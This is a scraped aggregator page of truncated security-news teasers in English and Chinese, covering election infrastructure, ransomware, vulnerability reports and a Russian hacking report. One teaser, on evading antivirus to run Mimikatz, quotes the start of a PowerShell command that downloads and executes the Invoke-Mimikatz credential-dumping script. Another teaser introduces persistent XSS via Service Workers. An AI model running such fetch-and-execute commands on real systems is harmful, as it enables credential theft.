Clik here to view.
Homeland Security classifies election infrastructure as critical
The Department of Homeland Security has officially classified election systems as critical infrastructure in order to keep them safe from tampering. Election infrastructure includes storage...
View ArticleClik here to view.
绕过杀毒软件运行Mimikatz
使用PowerSploit运行PowerShell脚本Invoke-Mimikatz被windows Defender标记为恶意 powershell "IEX (New-Object Net.WebClient).DownloadString ('https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/...
View ArticleClik here to view.
New Phones with Old Android Versions: Why Security Patches & Feature...
They say two things are inevitable, death and taxes; for us Android enthusiasts there is a third thing, and that’s reading debates and complaints about OS updates… or lack thereof. With billions of...
View ArticleSSL证书自动更新并应用到IKEv2, Nginx
申请SSL证书,首先需要避免用被Mozilla 拉黑的沃通(WoSign)及被沃通收购的StartCom. 沃通的一系列乱像和作死的缘由网上搜一下就清楚了. 这里还是推荐由美国加州公益组织ISRG 的 Let’s Encrypt . 优点在于可靠,可自动化,免费,口碑好. 缺点(其实算不上缺点)为有效期只有90天,但是完全可以自动化的进行续期来避免这个问题. 自动申请Let’s...
View ArticleClik here to view.
持久化 XSS:被 ServiceWorkers 支配的恐惧
0x01 前言 今天给大家介绍一项新的浏览器技术:Service Workers,以及在 XSS 攻击中的利用方式。 在利用 XSS 进行攻击的过程中经常会遇到一个问题,就是目标触发一次 XSS 水坑之后就不再触发了,但窃取到的信息并不足以进行下一步攻击,这时候我们就需要「持久化 XSS」的技术。在过去有很多种方式来提高 XSS 在线时间,如 opener hijack、link...
View ArticleClik here to view.
Ooma is adding DIY home security monitoring to its free VoIP telephone service
Ooma, one of the biggest names in VoIP (voice over internet protocol) phone service, is expanding into the DIY home security market. Ooma Telo owners will soon be able to install motion, door/window,...
View ArticleLas Vegas Captures Ransomware Crown
Las Vegas is arguably the gambling capital of the world, but it's also the king city for ransomware, based on recent research. Among the world's nations, the United States ranked highest in ransomware...
View ArticleClik here to view.
How to Avoid a Malicious Attack That Ransoms Your Data
Recently, there have been reports of malicious attacks on unsecured instances of MongoDB running openly on the internet.The attacker erased the database and demanded a ransom be paid before restoring...
View ArticleClik here to view.
Logitech Circle review: A great all-around home security camera (after some...
Logitech has been making cameras of the web variety for years, and it recently got into the home security camera market with Logitech Circle. The initial reviews were alright, but Logitech was lacking...
View ArticleClik here to view.
“灰熊草原”国家级的网络攻击到底该如何防御?
“灰熊草原”国家级的网络攻击到底该如何防御? 2017-01-09 22:10:08 来源:360企业安全 作者:安全客 阅读:76次 点赞(0) 收藏 日前,美国联邦调查局FBI与美国国土安全部DHS联合发布了一份题为《灰熊草原-俄罗斯的恶意网络活动》的联合分析报告,对于俄罗斯涉嫌干预美国大选的更多网络攻击细节进行了分析和公布。...
View ArticleClik here to view.
【技术分享】MM CORE内存型后门回归“BigBoss”和”SillyGoose“
【技术分享】MM CORE内存型后门回归“BigBoss”和”SillyGoose“ 2017-01-10 10:41:40 来源:blogs.forcepoint.com 作者:myswsun 阅读:76次 点赞(0) 收藏 翻译:myswsun 预估稿费:170RMB(不服你也来投稿啊!) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 0x00介绍...
View ArticleClik here to view.
【技术分享】浅谈动态爬虫与去重
【技术分享】浅谈动态爬虫与去重 2017-01-10 10:20:44 来源:安全客 作者:0keeTeam 阅读:652次 点赞(0) 收藏 作者:Fr1day@0keeTeam 预估稿费:600RMB(不服你也来投稿啊!) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 0x01 简介 随着Web...
View Article充电手机爆炸起火 手机安全充电全攻略
充电手机爆炸起火 手机安全充电全攻略 昨天来源:新文化网 远离手机爆炸 手机安全充电全攻略。8日中午12点半,郑州商鼎路与十里铺街交叉口附近一小区,一名男子在家中洗澡时,将手机放在床上充电,因手机充电爆炸起火,导致家中发生火灾,所幸无人伤亡。 手机安全充电全攻略 1、电池本身的原因。手机爆炸的真正根源为手机电池,由于电池内部缺陷,电池本身在不冲动、不放电的情况下爆炸。...
View ArticleClik here to view.
CNNVD漏洞月报(2016年12月)
CNNVD漏洞月报(2016年12月) 一点号CNNVD安全动态昨天 php?url=0FQJQ9BvAj" alt="CNNVD漏洞月报(2016年12月)" />本期导读漏洞态势 根据国家信息安全漏洞库(CNNVD)统计,2016年12月份采集安全漏洞共854个,Android平台和Mozilla Firefox浏览器成为黑客重要攻击目标。...
View ArticleClik here to view.
支付宝曝致命漏洞熟人可篡改密码 回应称正排查
php?url=0FQYlXkUcs" alt="支付宝曝致命漏洞熟人可篡改密码 回应称正排查" />【环球时报记者倪浩】1月10日凌晨,有网友在微博曝出支付宝登陆出现安全漏洞,熟人之间用一方的用户名输入其账户后,不输入密码而选择找回密码的方式,在接下来的认证选项中输入通过的朋友或熟人相关的信息,就可以成功登陆,并且可以免秘支付。...
View ArticleClik here to view.
信息安全漏洞周报(2017年第2期)
信息安全漏洞周报(2017年第2期) 一点号CNNVD安全动态昨天 php?url=0FQJPaBvAj" alt="信息安全漏洞周报(2017年第2期)" />根据国家信息安全漏洞库(CNNVD)统计,本周(2017年1月2日至2017年1月8日)安全漏洞情况如下: 本期导读采集漏洞情况 本周CNNVD采集安全漏洞142个,与上周(67个)相比有所增长。 接报漏洞情况...
View Article用制度扎进未成年人免受网络攻击的篱笆
近日,国家网信办起草《未成年人网络保护条例(送审稿)》指出,任何组织和个人不得通过网络以文字、图片、音视频等形式威胁、侮辱、攻击、伤害未成年人。送审稿明确,对未成年人实施网络欺凌,构成犯罪的,将被依法追究刑事责任。...
View ArticleClik here to view.
美俄“黑客门”持续发酵堪比大片,“灰熊草原”网络攻击到底如何防御?
美俄“黑客门”持续发酵堪比大片,“灰熊草原”网络攻击到底如何防御? 一点号360企业安全昨天 2016年的美国大选 堪比一场经典的电影大片 情节叠峦起伏php?url=0FQKRDpI4a" alt="美俄“黑客门”持续发酵堪比大片,“灰熊草原”网络攻击到底如何防御?" />先是希拉里与特朗普二人对轰 接着特朗普凭借“黑客门”成功逆袭 再下来奥巴马为希拉里助威指责俄罗斯干扰了大选...
View ArticleClik here to view.
专题 | 2016年全球网络空间安全大事记(政策篇)
专题 | 2016年全球网络空间安全大事记(政策篇) 一点号网络空间治理创新昨天 新一代网络信息技术发展推动网络空间与现实世界融合日益加深,网络空间安全的内涵不断扩展,影响日趋增大,成为关系各国国家安全、经济发展与社会治理的核心议题。...
View Article微软高通投资以色列网络安全创业公司Team8
新浪科技讯 北京时间1月10日消息,微软、高通旗下投资部门已经向Team8投资,Team8是一家以色列网络安全创业公司。网络威胁越来越严重,以色列网络安全产业发展迅速,科技巨头也想借势巩固地盘。...
View Article
